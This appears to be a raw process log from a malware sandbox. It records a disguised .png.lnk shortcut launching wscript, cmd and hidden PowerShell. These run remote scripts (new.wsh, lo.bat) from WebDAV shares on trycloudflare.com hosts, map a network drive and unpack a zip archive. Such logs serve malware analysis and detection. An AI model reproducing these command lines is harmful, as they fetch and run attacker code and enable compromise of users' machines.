cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NTVqLNzJkq" C:\Users\test22\AppData\Local\Temp\Artikel-4.png.lnk
2560wscript.exe "C:\Windows\System32\WScript.exe" "\\numbers-queensland-rec-thumbs.trycloudflare.com@SSL\DavWWWRoot\32\new.wsh"
2808cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\numbers-queensland-rec-thumbs.trycloudflare.com@SSL\DavWWWRoot\lo.bat
2940cmd.exe C:\Windows\system32\cmd.exe /K \\numbers-queensland-rec-thumbs.trycloudflare.com@SSL\DavWWWRoot\lo.bat
3008powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\numbers-queensland-rec-thumbs.trycloudflare.com@SSL\DavWWWRoot\lo.bat\" hidden' -WindowStyle Hidden"
908cmd.exe "C:\Windows\system32\cmd.exe" /c "\\numbers-queensland-rec-thumbs.trycloudflare.com@SSL\DavWWWRoot\lo.bat" hidden
1356iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2228 CREDAT:145409
2448net.exe net use U: "\\toolkit-nokia-network-alert.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
2652powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\test22\Contacts\deci.zip' -DestinationPath 'C:\Users\test22\Contacts' -Force"
536net.exe net use U: /delete /yes
2904